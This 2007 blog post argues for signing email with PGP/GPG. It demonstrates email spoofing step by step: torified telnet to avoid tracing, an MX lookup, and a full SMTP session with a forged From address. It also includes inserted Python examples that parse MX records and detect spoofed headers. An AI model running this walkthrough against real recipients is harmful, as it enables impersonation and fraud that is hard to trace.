Saturday, August 18, 2007

Why do you need PGP?

Let's answer a more basic question first: why do you need any security constructs like antivirus, firewall, IDS etc. at all? Maybe because:

  • You have secret/vital information to protect.
  • The exploit/attack is so easy that any casual user can do it.. for fun.

On my laptop running Linux I don't have an antivirus, firewall or IDS. I don't have any critical information on my laptop (the critical information is encrypted using my DNA sequence, scrambled using my iris pattern as seed, divided into blocks and stored on NSA servers :P), nor does it run continuously to give the attacker any time to conduct the attack... It's a different story altogether for workstations running 24x7. That said, why do I need PGP to encrypt/authenticate my mails then? It's not that I need to protect my mails from the public eye or even a passive listener.. come on, what can a person get by reading the emails I write to my friends and family!! The problem arises when he can write emails to my friends and family using my email ID.. and go undetected. The point of concern is how easy it is to do so.. let me show you how:

PLEASE NOTE: Doing this is illegal in the US and EU unless you own the email addresses you are using. Posing as a third party is considered identity theft and is a criminal offense. I am using email addresses that belong to me and this demonstration is for educational purposes only. I am not responsible for anything you might do with the information provided here.

  • Cover your tracks: What better way to do that than tor+privoxy!! Since I will be using telnet for this exploit, I need a way to torify telnet. The torify command does that, but I was too lazy to figure out the syntax. I grabbed tor_aliases to do that. It's a small script that you add to your .bashrc, which automatically torifies various net tools like telnet, scp etc. (Thanks t3rmin4t0r for pointing it out to me on #linux-india).
  • Find the SMTP server of the victim: I am going to send a mail to testingusage@gmail.com (again, the ID belongs to me and I use it for testing purposes). Let's figure out which SMTP server gmail uses..


    sridhar@pico:~$ dig mx gmail.com
    ; <<>> DiG 9.3.4 <<>> mx gmail.com
    ;; global options: printcmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8033
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 7

    ;; QUESTION SECTION:
    ;gmail.com. IN MX

    ;; ANSWER SECTION:
    gmail.com. 3534 IN MX 50 gsmtp183.google.com.
    gmail.com. 3534 IN MX 5 gmail-smtp-in.l.google.com.
    gmail.com. 3534 IN MX 10 alt1.gmail-smtp-in.l.google.com.
    gmail.com. 3534 IN MX 10 alt2.gmail-smtp-in.l.google.com.
    gmail.com. 3534 IN MX 50 gsmtp163.google.com.

    ;; ADDITIONAL SECTION:
    gmail-smtp-in.l.google.com. 214 IN A 209.85.199.114
    gmail-smtp-in.l.google.com. 214 IN A 209.85.199.27
    alt1.gmail-smtp-in.l.google.com. 237 IN A 64.233.167.114
    alt1.gmail-smtp-in.l.google.com. 237 IN A 64.233.167.27
    alt2.gmail-smtp-in.l.google.com. 285 IN A 66.249.91.27
    gsmtp163.google.com. 5883 IN A 64.233.163.27
    gsmtp183.google.com. 4017 IN A 64.233.183.27

    ;; Query time: 64 msec
    ;; SERVER: 192.168.1.1#53(192.168.1.1)
    ;; WHEN: Sun Jul 29 14:05:57 2007
    ;; MSG SIZE rcvd: 270


    MX records point to the servers that receive email for the domain. The numbers 50, 5, 10, 10, 50 you see are preference values: the lower the number, the higher the preference, so a sending mail server tries the lowest-numbered host first. For us it means the highest probability of a successful attack, which implies that we will be using gmail-smtp-in.l.google.com.

  • Speaking SMTP: The last step is to speak SMTP to make the server accept the mail. I am not going to teach you SMTP here. Check out RFC 821 for the details.

    sridhar@pico:~/blog$ telnet gmail-smtp-in.l.google.com. 25
    Resolving gmail-smtp-in.l.google.com. through tor... 209.85.129.27
    Trying 209.85.129.27...
    Connected to 209.85.129.27.
    Escape character is '^]'.
    220 mx.google.com ESMTP o11si2850482fkf
    502 5.5.1 Unrecognized command o11si2850482fkf
    helo
    250 mx.google.com at your service
    mail from: <testingusage@gmail.com>
    250 2.1.0 OK
    rcpt to: <testingusage@gmail.com>
    250 2.1.5 OK
    data
    354 Go ahead
    From: Someone <someone@someone.com>
    Subject: Testing

    I see the light!!

    .
    250 2.0.0 OK 1187318464 o11si2850482fkf
    quit
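Going back to the MX lookup step: the ordering rule described there (lowest preference value first, with the A records in the additional section giving the addresses) is easy to misread by eye on a longer answer. The following is an added example, not code from the original post, that parses the dig output shown above and returns the hosts in the order a sending mail server would try them. `DIG_OUTPUT` is a constructed copy of the answer and additional sections above.

```python
import re
from collections import defaultdict

# Constructed sample: the ANSWER and ADDITIONAL sections of the dig output above.
DIG_OUTPUT = """\
;; ANSWER SECTION:
gmail.com. 3534 IN MX 50 gsmtp183.google.com.
gmail.com. 3534 IN MX 5 gmail-smtp-in.l.google.com.
gmail.com. 3534 IN MX 10 alt1.gmail-smtp-in.l.google.com.
gmail.com. 3534 IN MX 10 alt2.gmail-smtp-in.l.google.com.
gmail.com. 3534 IN MX 50 gsmtp163.google.com.

;; ADDITIONAL SECTION:
gmail-smtp-in.l.google.com. 214 IN A 209.85.199.114
gmail-smtp-in.l.google.com. 214 IN A 209.85.199.27
alt1.gmail-smtp-in.l.google.com. 237 IN A 64.233.167.114
alt1.gmail-smtp-in.l.google.com. 237 IN A 64.233.167.27
alt2.gmail-smtp-in.l.google.com. 285 IN A 66.249.91.27
gsmtp163.google.com. 5883 IN A 64.233.163.27
gsmtp183.google.com. 4017 IN A 64.233.183.27
"""

# "<owner> <ttl> IN MX <preference> <exchange>" and "<owner> <ttl> IN A <ipv4>"
MX_RE = re.compile(r"^(\S+)\s+\d+\s+IN\s+MX\s+(\d+)\s+(\S+)$")
A_RE = re.compile(r"^(\S+)\s+\d+\s+IN\s+A\s+(\d+\.\d+\.\d+\.\d+)$")


def parse_dig_mx(text):
    """Return [(preference, host, [addresses])] ordered the way a sending
    MTA tries the exchanges: lowest preference first, ties broken by name."""
    exchanges, glue = [], defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):   # comments and section headers
            continue
        m = MX_RE.match(line)
        if m:
            exchanges.append((int(m.group(2)), m.group(3).rstrip(".")))
            continue
        a = A_RE.match(line)
        if a:
            glue[a.group(1).rstrip(".")].append(a.group(2))
    exchanges.sort()
    return [(pref, host, glue.get(host, [])) for pref, host in exchanges]


if __name__ == "__main__":
    for pref, host, addrs in parse_dig_mx(DIG_OUTPUT):
        print(f"{pref:>3} {host:<40} {', '.join(addrs)}")
```

Equal preferences (the two 10s, the two 50s) are alternatives a sender may pick between in any order; the sort here only makes the output deterministic.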

Please do note that testingusage@gmail.com is my own ID, so no harm done. What have I just done? Sent an email to testingusage@gmail.com as someone@someone.com... I could have used any email address there and nothing would be traceable back to me. The following screenshot shows the result:


As you can see, the message was marked as spam; that is because I did not create the mail properly and someone.com may be in its blacklist. It's fairly easy to fool those spam filters.

In fact the method just demonstrated is used a lot by spammers.. just a bit more refined and automated. Nothing is stopping your mortal enemy from impersonating you and wreaking havoc in your life. Yes, there are ways to detect a fake mail.. IP analysis, the route it takes etc. etc., but it all requires the receiver to be a paranoid geek. How many mails do you receive daily, and how many times have you stopped to check the authenticity of a mail?
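For the "IP analysis, the route it takes" kind of check mentioned above, here is an added example (not from the original post) of what such a receiver-side check looks like in code. It parses a raw message with Python's standard `email` library and applies three heuristics that the spoofed session above would trip: the envelope sender (`Return-Path`, which the receiving server records from `MAIL FROM`) differs from the header `From`; the first relay announced itself without a fully qualified host name; or the first relay is not in the `From` domain. Both messages are constructed samples: the header layout only approximates what a real delivery adds, and the addresses are from the RFC 5737 documentation ranges.

```python
import re
from email import message_from_string
from email.policy import default
from email.utils import parseaddr

# Constructed sample: roughly how the spoofed message from the telnet session
# would look on arrival. The envelope sender is the MAIL FROM address, the
# header From is the forged one, and the relay gave no host name in HELO.
SPOOFED = """\
Return-Path: <testingusage@gmail.com>
Received: by 10.78.1.1 with SMTP id x1cs12345; Fri, 17 Aug 2007 02:41:04 -0700 (PDT)
Received: from unknown ([203.0.113.5]) by mx.google.com with SMTP id o11si2850482fkf; Fri, 17 Aug 2007 02:41:04 -0700 (PDT)
From: Someone <someone@someone.com>
Subject: Testing

I see the light!!
"""

# Constructed sample of a message that passes: envelope and header sender
# agree, and the first hop is a host in that domain.
LEGIT = """\
Return-Path: <alice@example.org>
Received: from mail.example.org (mail.example.org [198.51.100.10]) by mx.google.com with ESMTP id abc123; Fri, 17 Aug 2007 02:41:04 -0700 (PDT)
From: Alice <alice@example.org>
Subject: Hello

Hi there.
"""

# "from <helo-name> (<reverse-dns> [<ip>])" as written by most MTAs
HOP_RE = re.compile(r"from\s+(\S+)\s*(?:\(([^)]*)\))?", re.IGNORECASE)
IP_RE = re.compile(r"\[(\d+(?:\.\d+){3})\]")


def domain_of(header_value):
    """Domain part of the address in a From/Return-Path style header."""
    if header_value is None:
        return ""
    _, addr = parseaddr(str(header_value))
    return addr.rpartition("@")[2].lower()


def first_hop(msg):
    """(helo_name, ip) of the hop closest to the sender: Received headers are
    prepended by each relay, so the bottom-most one is the first hop."""
    received = msg.get_all("Received") or []
    if not received:
        return None, None
    m = HOP_RE.search(str(received[-1]))
    if not m:
        return None, None
    ip = IP_RE.search(m.group(2) or "")
    return m.group(1).lower(), (ip.group(1) if ip else None)


def analyse(raw):
    """Return a list of findings; an empty list means nothing looked off."""
    msg = message_from_string(raw, policy=default)
    findings = []
    from_domain = domain_of(msg["From"])
    envelope_domain = domain_of(msg["Return-Path"])
    if envelope_domain and envelope_domain != from_domain:
        findings.append(f"envelope sender domain {envelope_domain!r} differs "
                        f"from header From domain {from_domain!r}")
    helo, ip = first_hop(msg)
    if helo is None:
        findings.append("no Received header: route cannot be traced")
    elif "." not in helo:
        findings.append(f"first hop {ip} announced itself as {helo!r}, "
                        "not a fully qualified host name")
    elif not (helo == from_domain or helo.endswith("." + from_domain)):
        findings.append(f"first hop {helo!r} ({ip}) is not in the From "
                        f"domain {from_domain!r}")
    return findings


if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED), ("legit", LEGIT)):
        print(name, analyse(raw) or ["no findings"])
```

These are heuristics, not proof: mail legitimately sent through a third-party provider or a mailing list also trips the first-hop check, which is exactly the "paranoid geek" problem the post describes and why a signature is a better answer than header forensics.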

So what is the solution?.. PGP, or its free, open source implementation GPG (GNU Privacy Guard). There are millions of tutorials on the web so I am not going to write another one here.

In a nutshell, it attaches a digital signature to your mail: a hash of the message, signed with your private key. Since it uses DSA, only you possess the key needed to create that signature. All other users can only verify it using your public key (which has to be published on key servers, e.g. http://pgp.mit.edu). The email client takes care of the whole process so you don't have to do anything except the initial setup.

Is it foolproof? NO.. This will only stop casual attacks. The attacker may spoof your identity, create a public key with your credentials and ask the receiver to download his public key, so the receiver might consider your emails fake and the attacker's emails real; but of course this is not something your friend would do for fun.

Bottom line: if you are breaking up with someone over email, proposing to someone or making a million dollar deal, use GPG to tell the receiver that it's really you :)
BTW, my PGP key is this. That said, I can always deny sending a mail which doesn't have my signature... which I might use to satisfy my evil ends.. Mwahahahaha.

PS: There is a chance that the attack shown above might not work. This would happen if your IP is blacklisted.

3 comments:

  1. This comment has been removed by the author.

  2. Hi Sridhar!

    Looks like there was a recent vulnerability in Gmail (a cross-site request forgery, which Google was quick to update) which allowed something very similar to what you have demonstrated. The vulnerability you described, is it only for Gmail or in general?

  3. This is not CSRF or CSS.. this is a flaw in SMTP and is not specific to Gmail.
